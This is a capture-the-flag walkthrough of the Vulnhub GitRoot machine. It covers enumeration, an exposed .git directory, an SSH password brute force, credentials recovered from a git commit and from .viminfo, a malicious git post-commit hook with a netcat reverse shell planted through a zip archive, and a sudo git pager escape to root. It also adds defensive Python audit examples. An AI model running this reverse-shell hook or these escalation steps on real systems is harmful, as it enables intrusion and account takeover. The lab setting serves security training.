[VLN] GitRoot

Today we are going to hack the Vulnhub machine called GitRoot:1. You can download it from the following link: https://www.vulnhub.com/entry/gitroot-1,488/
  • Enumeration
  • We start with an nmap scan of all TCP ports to see what is open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.45
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 22:39 CEST
    Nmap scan report for GitRoot.home (192.168.1.45)
    Host is up (0.0025s latency).
    Not shown: 65532 closed ports
    PORT      STATE SERVICE   VERSION
    22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 bf:45:f6:b3:e3:ce:0c:69:18:5a:5b:27:e5:d3:9c:86 (RSA)
    |   256 b5:d7:45:50:06:c4:e2:3c:28:52:b8:06:26:1f:de:b0 (ECDSA)
    |_  256 27:f0:d0:21:13:30:9c:5e:f0:70:a1:d8:5c:a7:8f:75 (ED25519)
    80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Hey Jen
    11211/tcp open  memcache?
    | fingerprint-strings:
    |   RPCCheck:
    |_    Unknown command
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port11211-TCP:V=7.80%I=7%D=6/5%Time=5EDAADBC%P=x86_64-pc-linux-gnu%r(RP
    SF:CCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unkn
    SF:own\x20command");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 93.69 seconds
    Port 11211 looks like memcached (the 0x81 magic byte in the fingerprint is a binary-protocol response header), but it is not needed for this box. We take a look at the website http://192.168.1.45/ and see: "Hey Jen, just installed wordpress over at wp.gitroot.vuln please go check it out!" So we add wp.gitroot.vuln to /etc/hosts. While we are at it, we also add gitroot.vuln. Since the server is clearly using name-based virtual hosts, we brute-force for more of them.
    sml@Cassandra:~$ gobuster vhost -u gitroot.vuln -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:          http://gitroot.vuln
    [+] Threads:      10
    [+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
    [+] User Agent:   gobuster/3.0.1
    [+] Timeout:      10s
    ===============================================================
    2020/06/05 22:42:29 Starting gobuster
    ===============================================================
    Found: repo.gitroot.vuln (Status: 200) [Size: 438]
    Found: wp.gitroot.vuln (Status: 200) [Size: 10697]
    ===============================================================
    2020/06/05 22:43:10 Finished
    ===============================================================
    We find repo.gitroot.vuln, so we add it to /etc/hosts as well. Let's see whether there is anything interesting on this new virtual host.
    sml@Cassandra:~$ gobuster dir -u repo.gitroot.vuln -w /usr/share/wordlists/dirb/common.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://repo.gitroot.vuln
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/06/07 23:21:35 Starting gobuster
    ===============================================================
    /.git/HEAD (Status: 200)
    /.htpasswd (Status: 403)
    /.hta (Status: 403)
    /.htaccess (Status: 403)
    /index.php (Status: 200)
    /javascript (Status: 301)
    /manual (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/06/07 23:21:39 Finished
    ===============================================================
    There is a /.git directory exposed over HTTP. Even without a directory listing, a .git directory always has the same layout, so we can request its files by their fixed names. We fetch http://repo.gitroot.vuln/.git/index, the staging area: a binary file listing every tracked path together with its blob hash, so it tells us what the repository contains even before we pull any objects. Let's see if anything in it is of interest...
    sml@Cassandra:~/Descargas$ strings index
    DIRC
    D33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
    GkL^
    get.php
    index.php
    3K*P'cg
    pablo_HELP.txt
    v;T&w^
    set.php
    GkL^
    stats.php
    TREE
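    strings only shows the printable fragments between the binary fields. The index is a documented format and can be parsed properly: a 12-byte header (DIRC, version, entry count), then one entry per tracked path (stat data, mode, size, 20-byte object name, 16-bit flags whose low 12 bits are the path length, the NUL-terminated path, NUL padding to a multiple of 8 bytes), optional extensions, and a trailing SHA-1 over everything before it. The Python below is an added example, not tooling from the original write-up or from the box: it builds a small index from constructed data (file names borrowed from the strings output above, contents invented), parses it back with a checksum check, and shows where each blob would live under .git/objects and how to inflate it once fetched. Function names such as build_index and read_loose_object are this example's own.

```python
import hashlib
import struct
import zlib

# One index entry before the path: 10 x uint32 (ctime s/ns, mtime s/ns, dev, ino,
# mode, uid, gid, size), a 20-byte object name and 16-bit flags = 62 bytes, big-endian.
ENTRY_FIXED = struct.Struct(">10I20sH")


def object_id(otype: bytes, content: bytes) -> bytes:
    """Git object name: sha1 over "<type> <size>\\0<content>"."""
    return hashlib.sha1(b"%s %d\0" % (otype, len(content)) + content).digest()


def make_loose_object(otype: bytes, content: bytes) -> bytes:
    """What .git/objects/xx/yyyy... holds on disk: zlib-deflated header + content."""
    return zlib.compress(b"%s %d\0" % (otype, len(content)) + content)


def loose_object_path(sha_hex: str) -> str:
    """Where to fetch a blob once its name is known from the index."""
    return ".git/objects/%s/%s" % (sha_hex[:2], sha_hex[2:])


def read_loose_object(raw: bytes):
    """Inflate a loose object and return (type, content), checking the header's size."""
    data = zlib.decompress(raw)
    header, _, content = data.partition(b"\0")
    otype, size = header.split(b" ")
    if int(size) != len(content):
        raise ValueError("object header size does not match content length")
    return otype.decode(), content


def build_index(files: dict) -> bytes:
    """Build a minimal version-2 index from {path: content} (constructed test data)."""
    body = struct.pack(">4sII", b"DIRC", 2, len(files))
    for path in sorted(files):  # git keeps entries sorted by path
        name = path.encode()
        flags = min(len(name), 0xFFF)  # stage 0, no assume-valid/extended bits
        entry = ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 1000, 1000,
                                 len(files[path]), object_id(b"blob", files[path]),
                                 flags) + name
        entry += b"\0" * (((len(entry) + 8) & ~7) - len(entry))  # 1-8 NULs, pad to 8
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over everything above


def parse_index(data: bytes) -> list:
    """Return [(path, sha1_hex, mode, size)] for a v2/v3 index.

    Raises ValueError on a truncated download, bad signature or unsupported
    version: the first thing to check on an index pulled off a web server.
    """
    if len(data) < 32 or hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch: truncated or corrupted file")
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC":
        raise ValueError("not a git index (bad DIRC signature)")
    if version not in (2, 3):
        raise ValueError("unsupported index version %d (v4 prefix-compresses paths)" % version)
    entries, off = [], 12
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, off)
        mode, size, sha, flags = fields[6], fields[9], fields[10], fields[11]
        start = off + ENTRY_FIXED.size
        if version == 3 and flags & 0x4000:  # v3 "extended" bit: one more 16-bit flags word
            start += 2
        name_len = flags & 0xFFF
        if name_len < 0xFFF:
            name = data[start:start + name_len]
        else:  # path of 4095+ bytes: the length field saturates, scan to the NUL
            name = data[start:data.index(b"\0", start)]
        off += ((start - off) + len(name) + 8) & ~7  # entry is NUL-padded to 8 bytes
        entries.append((name.decode(), sha.hex(), mode, size))
    return entries


if __name__ == "__main__":
    # Constructed sample: names seen in the strings output above, contents invented.
    sample = build_index({"index.php": b"<?php\n", "get.php": b"<?php\n",
                          "set.php": b"<?php\n", "stats.php": b"<?php\n",
                          "pablo_HELP.txt": b"help\n"})
    for path, sha, mode, size in parse_index(sample):
        print("%o %s %5d %s -> %s" % (mode, sha, size, path, loose_object_path(sha)))
```

    With the blob names from the index, each file can be requested as http://repo.gitroot.vuln/.git/objects/xx/yyyy... and inflated with read_loose_object; objects that only exist inside a packfile will 404 that way and need .git/objects/pack/ instead.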
    There is a file called pablo_HELP.txt, which suggests a user named pablo, so we brute-force his SSH password. (The VM picked up different DHCP addresses across the sessions in this write-up, which is why the target IP varies between outputs.)
    sml@Cassandra:~$ hydra -l pablo -P FU.txt 192.168.1.140 ssh -I
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 12:18:32
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
    [DATA] attacking ssh://192.168.1.140:22/
    [22][ssh] host: 192.168.1.140   login: pablo   password: mastergitar
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 12:18:33
  • Low Shell
  • We connect over SSH as "pablo" with the password we just obtained, "mastergitar" :)
    sml@Cassandra:~/$ ssh pablo@192.168.1.180
    pablo@GitRoot:~$ ls
    public  user.txt
    pablo@GitRoot:~$ cat user.txt
    [ASCII-art banner reading "Thank you Pablo"]

    Great job! Do not falter, there is more to do. You made it this far, finish the race!
    "It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein
    8a81007ea736a2b8a72a624672c375f9ac707b5e
    Let's explore a bit more...
    pablo@GitRoot:~$ cd public
    pablo@GitRoot:~/public$ ls -l
    total 4
    -rw-r--r-- 1 beth beth 58 May 25 23:08 message.txt
    pablo@GitRoot:~/public$ cat message.txt
    Hey pablo
    Make sure to check-out our brand new git repo!
    "beth" has left us a message telling us to check out the new git repository. Let's find it.
    pablo@GitRoot:~/public$ find / -name .git 2>/dev/null
    /opt/auth/.git
    /var/www/repo/.git
    The new repository she is talking about is /opt/auth/.git. The reflog under .git/logs is world-readable, so we can list every commit that was ever made and then inspect the changes with git show.
    pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat *
    ----SNIP----
    0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name 1590499965 -0400	branch: Created from HEAD
    fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name 1590500014 -0400	commit: init repo
    b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name 1590500148 -0400	commit: added some stuff
    ----SNIP----
    pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93
    commit 06fbefc1da56b8d552cfa299924097ba1213dd93
    Author: Your Name
    Date:   Tue May 26 09:35:48 2020 -0400

        added some stuff

    diff --git a/main.c b/main.c index 70e6397..8af9b9c 100644 --- a/main.c +++ b/main.c @@ -4,6 +4,15 @@ int main(){ char pass[20]; - return 0; + scanf("%20s", pass); + printf("You put %s\n", pass); + if (strcmp(pass, "r3vpdmspqdb") == 0 ){ + char *cmd[] = { "bash", (char *)0 }; + execve("/bin/bash", cmd, (char *) 0); + } + else{ + puts("BAD PASSWORD"); + } + return 0; } -//43 +
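    Review bot: the input handling added to main() overflows pass by one byte: with `char pass[20]`, `scanf("%20s", pass)` stores up to 20 characters and then a terminating NUL, i.e. 21 bytes; use `%19s` or make the buffer 21 bytes. The check `strcmp(pass, "r3vpdmspqdb") == 0` also bakes the secret into the source, so it is recoverable by anyone who can read this commit, which is exactly what the rest of this write-up does.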
    One of the commits contains what could well be beth's password. Let's try it :)
    pablo@GitRoot:/tmp/j$ su beth
    Password: r3vpdmspqdb
    beth@GitRoot:~$ id
    uid=1001(beth) gid=1001(beth) groups=1001(beth)
    Now that we have beth's privileges, let's look around.
    beth@GitRoot:~$ cd ~
    beth@GitRoot:~$ cd public
    beth@GitRoot:~/public$ ls -l
    total 4
    -rw-r--r-- 1 jen jen 151 May 26 00:29 addToMyRepo.txt
    beth@GitRoot:~/public$ cat addToMyRepo.txt
    Hello Beth
    If you want to commit to my repository you can add a zip file to ~jen/public/repos/ and ill unzip it and add it to my repository
    Thanks!
    So "jen" wants us to drop a zip file in the folder she indicates; she will unzip it and add it to her repository. We'll abuse git "hooks": hooks live in .git/hooks and are never versioned, but if jen unpacks our archive on top of her repository, the .git/hooks/post-commit we ship lands in her checkout and git runs it with her privileges right after her next commit. In our case it will launch a reverse shell.
    beth@GitRoot:~/public$ cd /tmp
    beth@GitRoot:~/tmp$ mkdir -p .git/hooks
    beth@GitRoot:~/tmp$ cd .git/hooks
    beth@GitRoot:~/tmp/.git/hooks$ nano post-commit
    Inside the post-commit file we put:
    #!/bin/sh
    /usr/bin/nc -e /bin/bash 192.168.1.148 5555
    We make it executable (the mode is stored in the archive and restored on unpacking), zip it up and put it where jen expects it.
    beth@GitRoot:~/tmp/.git/hooks$ chmod 777 post-commit
    beth@GitRoot:~/tmp/.git/hooks$ chmod +x post-commit
    beth@GitRoot:~/tmp/.git/hooks$ cd /tmp
    beth@GitRoot:~/tmp$ 7z a yo.zip .git/
    beth@GitRoot:~/tmp$ chmod 777 yo.zip
    beth@GitRoot:~/tmp$ cp yo.zip /home/jen/public/repos
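    The whole trick depends on jen unpacking an untrusted archive on top of her own repository. The Python below is an added example, not tooling from the write-up or from the box: it builds the same kind of archive in memory (a harmless echo standing in for the nc payload) and shows the check jen should have run before unpacking anything from ~jen/public/repos: refuse entries under .git, paths that escape the destination directory (zip slip), and files with an executable bit. The archives are constructed here, and the function names (build_zip, audit_zip) are this example's own.

```python
import io
import posixpath
import zipfile

# Stand-in for the hook from the write-up: same trigger, harmless body instead of nc.
HOOK = b"#!/bin/sh\necho \"post-commit hook ran as $(id -un)\"\n"


def build_zip(files: dict) -> bytes:
    """files: {archive_path: (unix_mode, content)} -> zip bytes, built in memory.

    The Unix mode goes in the high 16 bits of external_attr; 7z and unzip restore it,
    which is why a 0755 hook comes out of the archive ready to run.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, (mode, content) in files.items():
            info = zipfile.ZipInfo(name)  # no path sanitising: "../" survives, as in a real attack
            info.external_attr = mode << 16
            zf.writestr(info, content)
    return buf.getvalue()


def audit_zip(data: bytes) -> list:
    """Return [(entry, reason)] for everything that must not be unpacked into a repo.

    Checks, in order: zip slip (absolute or ../ paths), anything under a .git
    directory (hooks and config run code on the next git command), and files
    carrying an executable bit.
    """
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = posixpath.normpath(name).split("/")
            mode = (info.external_attr >> 16) & 0o777
            if name.startswith("/") or parts[0] == "..":
                bad.append((name, "escapes the destination directory"))
            elif ".git" in parts:
                bad.append((name, "writes into .git (hooks/config execute on the next git command)"))
            elif mode & 0o111:
                bad.append((name, "executable bit set (mode %o)" % mode))
    return bad


# Constructed archives: the attacker's one from the write-up, and a clean contribution.
HOOK_ZIP = build_zip({".git/hooks/post-commit": (0o100755, HOOK)})
CLEAN_ZIP = build_zip({"src/main.c": (0o100644, b"int main(void) { return 0; }\n")})

if __name__ == "__main__":
    for label, archive in (("yo.zip", HOOK_ZIP), ("clean.zip", CLEAN_ZIP)):
        print(label, audit_zip(archive) or "ok")
```

    Even with the audit, the safe workflow is to unpack contributions into a scratch directory and git add from there, never on top of a checkout; setting core.hooksPath to a directory the contributor cannot write to also takes .git/hooks out of the picture.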
    We start nc listening on our machine.
    sml@Cassandra:~$ nc -nlvp 5555
    After a while...
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.80] 52104
    python -c 'import pty; pty.spawn("/bin/bash")'
    $ id
    uid=1003(jen) gid=1003(jen) groups=1003(jen)
    Now that we are "jen", we explore the system a bit. Her home directory has a ~/.viminfo file, where vim keeps its search-string history, and one of the searches looks a lot like a password typed into the wrong place...
    jen@GitRoot:~$ cd ~
    jen@GitRoot:~$ cat .viminfo
    ---SNIP---
    # This viminfo file was generated by Vim 8.1.

    # Search String History (newest to oldest):
    ?/binzpbeocnexoe
    |2,1,1590471908,47,"binzpbeocnexoe"

    # Expression History (newest to oldest):

    # Input Line History (newest to oldest):

    # Debug Line History (newest to oldest):

    # Registers:

    # File marks:
    ---SNIP----
    Let's see what we can run with sudo, using the candidate password from .viminfo.
  • Privilege Escalation
  • jen@GitRoot:~$ sudo -l
    [sudo] password for jen: binzpbeocnexoe
    Matching Defaults entries for jen on GitRoot:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User jen may run the following commands on GitRoot:
        (ALL) /usr/bin/git
    It works :) We can run "sudo git" with any arguments, and that is enough to escalate: "git -p help config" forces the help text through a pager (less), and less's "!" command runs a shell command as the user the pager belongs to, i.e. root. So...
    sudo git -p help config
    !/bin/sh
    # cd /root
    # ls
    passwords  POC  root.txt  setpasswords.php
    # cat root.txt
    Thank you for completing my box! Please let my know what you liked and what you didn't like at my twitter @Recursive_NULL
    734ae32be131cd0681f86c03858f4f587a3c69ce
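    The root cause is a sudoers rule that hands out a whole binary with a pager, an editor and a hook mechanism, without the NOEXEC tag. As an added example (not from the write-up or the box), the Python below audits sudoers-style rules for that pattern. The sample rules are constructed, modelled on the one found on the box; the set of shell-capable binaries is a partial GTFOBins-style list, not a complete one; and tags are parsed per command, a simplification of real sudoers syntax where a tag carries forward across the rest of the list.

```python
import posixpath
import re

# Binaries that hand the caller a shell through a pager, editor, hook or scripting
# feature once run under sudo (partial list; git is the one abused on this box).
SHELL_CAPABLE = {"git", "vim", "vi", "less", "more", "man", "nano", "find",
                 "awk", "perl", "python", "python3"}

# user  host=(runas[:group]) [TAG: ...] command[, command...]
RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"^(?:[A-Z]+:\s*)+")  # NOEXEC:, NOPASSWD:, SETENV: ...


def audit_sudoers(text: str) -> list:
    """Return (user, runas, command, reason) for every rule that can reach a shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = m["runas"] or "root"  # sudoers default target user
        for cmd in m["rest"].split(","):
            cmd = cmd.strip()
            tags = set()
            tm = TAG.match(cmd)
            if tm:
                tags = {t.strip() for t in tm.group(0).split(":") if t.strip()}
                cmd = cmd[tm.end():]
            if cmd == "ALL":
                findings.append((m["user"], runas, cmd, "unrestricted: any command as " + runas))
                continue
            binary = posixpath.basename(cmd.split()[0]) if cmd else ""
            if binary in SHELL_CAPABLE and "NOEXEC" not in tags:
                findings.append((m["user"], runas, cmd,
                                 "%s can spawn a shell (pager/editor/hook) without NOEXEC" % binary))
    return findings


# Constructed sample, modelled on the rule sudo -l showed for jen.
SAMPLE = """\
Defaults env_reset, mail_badpass
jen     ALL=(ALL) /usr/bin/git
beth    ALL=(root) NOEXEC: /usr/bin/git log
pablo   ALL=(ALL) NOPASSWD: /bin/cat /var/log/apache2/access.log
ops     ALL=(ALL) ALL
"""

if __name__ == "__main__":
    for user, runas, cmd, reason in audit_sudoers(SAMPLE):
        print("%-6s (%s) %-28s %s" % (user, runas, cmd, reason))
```

    NOEXEC makes sudo block the child exec that launches the pager or a hook, but a user who can run git as root can still read and write files as root with ordinary git operations, so the real fix for jen's rule is to remove it rather than tag it.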
  • End
  • And with that we are root on the machine :)